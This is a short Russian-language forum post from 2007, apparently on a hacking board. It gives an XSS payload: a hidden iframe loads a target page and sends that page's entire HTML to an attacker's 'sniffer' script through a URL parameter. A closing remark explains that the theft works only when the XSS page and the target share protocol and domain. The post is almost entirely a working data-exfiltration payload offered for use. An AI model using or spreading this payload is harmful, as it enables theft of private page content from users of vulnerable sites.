19.05.2007, 18:50
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137
Репутация:
201
|
|
Код HTML:
<iframe id="i1" name="i1" style="display:none" src="http://that/we/wish/to.steal" onload="i1.onload='';i1.contentDocument.location='http://our/sniffer.script?data='+escape(i1.contentDocument.getElementsByTagName('html')[0].innerHTML)"></iframe>
Это будет работать, естественно, если не противоречит безопасности JavaScript, т.е. страница с xss и похищяемая должны иметь одинаковые протокол и домен. |
|
|